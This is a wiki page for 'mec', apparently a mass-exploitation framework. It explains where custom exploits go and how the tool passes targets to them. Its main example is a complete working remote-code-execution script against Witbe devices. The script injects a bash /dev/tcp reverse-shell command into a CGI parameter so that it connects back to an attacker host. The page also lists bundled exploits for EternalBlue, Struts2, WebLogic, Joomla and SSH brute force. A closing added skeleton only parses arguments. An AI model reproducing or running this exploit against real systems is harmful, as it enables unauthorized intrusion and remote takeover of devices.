
Custom Exploits

jm33-ng edited this page Feb 28, 2020 · 6 revisions

FAQ

Where to put my custom exploit?

ls ./exploits/your-custom-exploit/
your-exploit-executable your-other-files

Is there any example?

#!/usr/bin/python3
# pylint: disable=invalid-name, line-too-long, import-error, no-member, missing-docstring, broad-except
# Exploit Title: Witbe RCE (Remote Code Execution)
# Exploit Author: BeLmar
# Date: 05/10/2016
# DEMO : https://youtu.be/ooUFXfUfIs0
# Contact : [email protected]
# Vendor Homepage: http://www.witbe.net
# Tested on: Windows7/10 & BackBox
# Category: Remote Exploits

import argparse
import sys
import traceback
import urllib.error
import urllib.parse
import urllib.request


def main():
    parser = argparse.ArgumentParser(prog='witbe.py', description='pwn witbe')
    parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Server')
    parser.add_argument('-l', dest='LHOST', required=True, help='specify local ip for reverse shell')
    parser.add_argument('-p', dest='LPORT', required=True, help='specify local port for reverse shell')
    #parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')
    args = parser.parse_args()
    rhost = args.RHOST
    lhost = args.LHOST
    lport = args.LPORT


    url = 'http://'+rhost+'/cgi-bin/applyConfig.pl'
    # user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36'
    values = {
        'auth_login': '', #Leave it as it is
        'auth_pwd': '',   #Leave it as it is
        'file': 'set|bash -i >& /dev/tcp/'+lhost+'/'+lport+' 0>&1'
    }

    try:
        data = urllib.parse.urlencode(values).encode("utf-8")
        req = urllib.request.Request(url, data)
        response = urllib.request.urlopen(req)
        print(response.read())
    except Exception:  # catch request errors only, so Ctrl-C still reaches the KeyboardInterrupt handler below
        print(f"Error: {traceback.format_exc()}")

try:
    main()
except KeyboardInterrupt:
    sys.exit(1)

How does mec pass "target_ip" argument to my script?

In the example above you can see that mec simply passes target_ip as the last argument, which the script picks up with a single -t option:

parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Server')

Note that mec passes -t <target> to your exploit, so when mec executes your exploit its command line looks like:

./exploit <custom args> -t <target ip>

Directory hierarchy

mec directory tree

mec
├── conf
│   ├── censys.conf
│   └── zoomeye.conf
├── data
│   ├── ip_list.txt
│   ├── proxy.conf
│   ├── ss.json
│   └── zoomeye-login.action.txt
├── exploits
│   ├── exserial
│   ├── joomla
│   ├── MS17-010
│   ├── ssh-bruteforce
│   ├── structs2
│   ├── test
│   ├── weblogic
│   ├── witbe
│   └── wordpress
├── install.py
├── lib
│   ├── cli
│   ├── __init__.py
│   ├── __pycache__
│   └── tools
├── LICENSE
├── mec
├── mec.py
├── output
│   └── result.txt
├── README.md
├── requirements.txt
├── screenshot
│   ├── main.jpg
│   └── zoomeye.jpg
└── tools
    ├── geckodriver
    └── ss-proxy

Your "test" exploit

Your custom exploits live under ./exploits, just like any built-in ones.

Take a look at the test exploit:

├── structs2
│   ├── 045.py
│   ├── colors.py
│   ├── console.py
│   ├── s2_045_cmd.py
│   ├── Struts2_045-Poc
│   ├── struts2-s2045.py
│   └── tmp.txt
├── test
│   └── test
├── weblogic

./exploits/test/test is the exploit. You can view all available exploits by issuing the exploits command in mec:

mec > exploits
[+] Available exploits:
witbe/witbe.py
test/test
joomla/rce-ssl.py
joomla/joomraa.py
joomla/rce.py
joomla/joomlaCVE-2015-8562.py
joomla/rcew.py
joomla/hackUtils.py
joomla/joomla_sqli_mass_exploit.py
exserial/jenkin.py
exserial/websphere.py
exserial/weblogic.py
exserial/jboss.py
wordpress/rce.sh
ssh-bruteforce/ssh_bruteforce.py
weblogic/weblogic.py
weblogic/batch_weblogic.sh
weblogic/scan.py
structs2/045.py
structs2/s2_045_cmd.py
structs2/struts2-s2045.py

How mec works

mec enters the target exploit's directory before launching a mass-exploit job, so relative paths are allowed: your custom exploit's working directory won't change while mec is running it.

Your exploit can be either a binary or a script, as long as you chmod +x it first. Before launching a mass-exploit job, you will see a warning reminding you how your exploit is going to be executed:

[!] DEBUG: ['./ssh_bruteforce.py', '/tmp/1', 'id', '-t']
Working in /home/u/.mec/exploits/ssh-bruteforce
[?] Proceed? [y/n]
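The following is an added example, not code from mec or from any of its bundled exploits. It shows a minimal custom-exploit entry point that parses the command line exactly as described above (custom arguments first, then -t <target> appended last), keeps the custom arguments intact with parse_known_args(), validates the target as an IP address or ip:port instead of splicing it into a shell string, and resolves files relative to the script's own directory so it behaves the same whether mec has chdir'd into the exploit directory or not. The helper names (build_argv, parse_exploit_args, validate_target, exploit_dir) and the sample target values are assumptions made for this example; only the -t / RHOST convention comes from the page.

```python
#!/usr/bin/env python3
"""Added example (not mec's own code): a custom-exploit entry point that
parses argv the way mec builds it:  ./exploit <custom args> -t <target ip>
Helper names and sample values below are constructed for this example."""
import argparse
import ipaddress
import os
import sys


def build_argv(exploit, custom_args, target):
    """Reproduce the argv layout mec uses: custom args first, then '-t <target>'.
    Assumption: mirrors the DEBUG line shown on the wiki with the target appended."""
    return [exploit, *custom_args, "-t", target]


def parse_exploit_args(argv):
    """Parse argv[1:] as a custom exploit would. parse_known_args() returns the
    caller's own positional/custom arguments untouched even though '-t' comes last."""
    parser = argparse.ArgumentParser(prog=os.path.basename(argv[0]), add_help=False)
    parser.add_argument("-t", dest="RHOST", required=True, help="Remote Target Server")
    opts, custom = parser.parse_known_args(argv[1:])
    return opts.RHOST, custom


def validate_target(rhost):
    """Accept 'ip' or 'ipv4:port' and return (ip_str, port_or_None).
    Raises ValueError for anything that is not a literal IP address, so a
    malformed target from a scan result never reaches a command line or URL."""
    if rhost.count(":") == 1:           # IPv4 with a port; bare IPv6 has more colons
        host, port = rhost.split(":")
    else:
        host, port = rhost, ""
    ip = ipaddress.ip_address(host)      # ValueError on garbage
    if port:
        p = int(port)
        if not 1 <= p <= 65535:
            raise ValueError(f"port out of range: {port}")
        return str(ip), p
    return str(ip), None


def exploit_dir():
    """mec enters the exploit's directory, so relative paths work; resolving
    against __file__ gives the same answer when the script is run from elsewhere."""
    return os.path.dirname(os.path.abspath(__file__))


def main(argv=None):
    argv = sys.argv if argv is None else argv
    rhost, custom = parse_exploit_args(argv)
    ip, port = validate_target(rhost)
    # A real exploit would act on ip/port here; this skeleton only reports what it parsed.
    print(f"target={ip} port={port} custom={custom} cwd={os.getcwd()} exploit_dir={exploit_dir()}")
    return 0


if __name__ == "__main__":
    sys.exit(main())
```

Invoked as ./test /tmp/1 id -t 10.0.0.5 (the shape mec prints in its DEBUG line), the script receives RHOST="10.0.0.5" and custom=["/tmp/1", "id"]; a non-IP target such as "10.0.0.5;id" is rejected by validate_target() before anything else runs.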